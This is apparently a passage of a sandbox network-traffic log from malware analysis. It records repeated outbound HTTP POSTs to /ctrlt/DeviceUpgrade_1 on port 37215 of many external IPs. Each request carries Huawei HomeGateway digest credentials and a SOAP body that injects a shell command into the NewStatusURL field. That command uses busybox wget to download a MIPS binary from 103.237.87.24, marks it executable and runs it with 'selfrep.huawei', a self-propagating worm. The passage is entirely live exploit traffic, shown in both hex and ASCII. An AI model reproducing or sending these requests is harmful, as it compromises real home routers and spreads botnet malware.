6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  82192.168.2.1344038181.26.200.17237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.061484098 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  83192.168.2.134504241.213.31.3737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.061764956 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  84192.168.2.1351238197.98.187.17037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.061764956 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  85192.168.2.1342406157.95.171.11037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.061770916 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  86192.168.2.1337502197.39.57.16137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.061780930 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  87192.168.2.1343616197.40.168.6537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.061783075 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  88192.168.2.1335936197.116.20.1737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.061793089 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  89192.168.2.1355362122.58.188.2237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.061799049 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  90192.168.2.1341838197.79.130.5637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.061799049 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  91192.168.2.134359041.186.175.21237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.061800003 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  92192.168.2.1341978157.41.134.6037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.061811924 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
